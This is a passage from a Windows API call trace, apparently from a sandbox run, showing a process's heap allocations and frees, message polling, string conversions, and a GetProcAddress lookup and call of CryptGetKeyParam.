0x9aa4f8 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0180.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0180.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0180.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.164] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0180.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0180.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0180.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0180.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0180.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0180.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0180.165] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0180.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0180.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0180.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.166] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0180.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0180.166] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0180.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0180.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0180.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0180.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0180.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0180.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0180.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0180.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0180.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0180.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0180.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0180.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0180.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0180.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0180.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0180.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.172] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0180.172] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2798, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2798*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0180.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.173] HeapFree (in: hHeap=0x8a0000, 